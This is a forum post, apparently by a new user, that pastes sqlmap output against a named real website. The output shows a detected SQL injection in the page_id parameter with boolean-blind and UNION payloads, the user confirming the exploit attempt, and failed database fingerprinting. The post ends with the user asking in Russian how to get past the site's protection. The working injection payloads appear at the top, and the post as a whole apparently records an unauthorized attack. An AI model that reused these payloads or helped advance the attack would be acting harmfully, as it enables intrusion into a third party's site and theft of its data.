
25.11.2025, 02:15
|
|
Новичок
Регистрация: 24.11.2025
Сообщений: 0
Провел на форуме: 0
Репутация:
0
|
|
Parameter: page_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: page_id=-6154) OR 5450=5450 AND (8862=8862&=1
Type: UNION query
Title: Generic UNION query (random number) - 8 columns
Payload: page_id=-6697) UNION ALL SELECT 6812,6812,6812,6812,6812,6812,6812,'qjqxq'||'XrrFQ nvzWGtBSHNuZlXbUDgQvCKGcXoHkTZgeAfY'||'qjvkq';--&=1
---
do you want to exploit this SQL injection? [Y/n] Y
[08:14:07] [INFO] testing CrateDB
[08:14:08] [WARNING] the back-end DBMS is not CrateDB
[08:14:08] [INFO] testing MySQL
[08:14:10] [WARNING] the back-end DBMS is not MySQL
[08:14:10] [INFO] testing Oracle
[08:14:11] [WARNING] the back-end DBMS is not Oracle
[08:14:11] [INFO] testing PostgreSQL
[08:14:12] [WARNING] the back-end DBMS is not PostgreSQL
[08:14:12] [INFO] testing Microsoft SQL Server
[08:14:14] [WARNING] the back-end DBMS is not Microsoft SQL Server
[08:14:14] [INFO] testing SQLite
[08:14:15] [WARNING] the back-end DBMS is not SQLite
[08:14:15] [INFO] testing Microsoft Access
[08:14:16] [WARNING] the back-end DBMS is not Microsoft Access
[08:14:16] [INFO] testing Firebird
[08:14:17] [WARNING] the back-end DBMS is not Firebird
[08:14:17] [INFO] testing SAP MaxDB
[08:14:18] [WARNING] the back-end DBMS is not SAP MaxDB
[08:14:18] [INFO] testing Sybase
[08:14:19] [WARNING] the back-end DBMS is not Sybase
[08:14:19] [INFO] testing IBM DB2
[08:14:20] [WARNING] the back-end DBMS is not IBM DB2
[08:14:20] [INFO] testing HSQLDB
[08:14:21] [WARNING] the back-end DBMS is not HSQLDB
[08:14:21] [INFO] testing H2
[08:14:22] [WARNING] the back-end DBMS is not H2
[08:14:22] [INFO] testing Informix
[08:14:23] [WARNING] the back-end DBMS is not Informix
[08:14:23] [INFO] testing MonetDB
[08:14:24] [WARNING] the back-end DBMS is not MonetDB
[08:14:24] [INFO] testing Apache Derby
[08:14:26] [WARNING] the back-end DBMS is not Apache Derby
[08:14:26] [INFO] testing Vertica
[08:14:27] [WARNING] the back-end DBMS is not Vertica
[08:14:27] [INFO] testing Mckoi
[08:14:29] [WARNING] the back-end DBMS is not Mckoi
[08:14:29] [INFO] testing Presto
[08:14:30] [WARNING] the back-end DBMS is not Presto
[08:14:30] [INFO] testing Altibase
[08:14:31] [WARNING] the back-end DBMS is not Altibase
[08:14:31] [INFO] testing MimerSQL
[08:14:32] [WARNING] the back-end DBMS is not MimerSQL
[08:14:32] [INFO] testing ClickHouse
[08:14:32] [WARNING] the back-end DBMS is not ClickHouse
[08:14:32] [INFO] testing Cubrid
[08:14:33] [WARNING] the back-end DBMS is not Cubrid
[08:14:33] [INFO] testing InterSystems Cache
[08:14:34] [WARNING] the back-end DBMS is not InterSystems Cache
[08:14:34] [INFO] testing eXtremeDB
[08:14:35] [WARNING] the back-end DBMS is not eXtremeDB
[08:14:35] [INFO] testing FrontBase
[08:14:37] [WARNING] the back-end DBMS is not FrontBase
[08:14:37] [INFO] testing Raima Database Manager
[08:14:38] [WARNING] the back-end DBMS is not Raima Database Manager
[08:14:38] [INFO] testing Virtuoso
[08:14:39] [WARNING] the back-end DBMS is not Virtuoso
[08:14:39] [ERROR] sqlmap was not able to fingerprint the back-end database management system, skipping to the next target
SQL injection vulnerability has already been detected against 'alwalalyemeni.com'. Do you want to skip further tests involving it? [Y/n] Y
[08:14:39] [INFO] skipping 'من نحن - alwalaly'
[08:14:39] [INFO] skipping '- alwalaly'
[08:14:39] [INFO] skipping 'الوزير - alwalaly'
[08:14:39] [INFO] skipping 'الوعل - alwalaly'
[08:14:39] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'Local\sqlmap\output\results-11052025_0906pm.csv'
[*] ending @ 08:14:39 /2025-11-06/
Что мне делать дальше? Я не могу обойти защиту.
|
|
|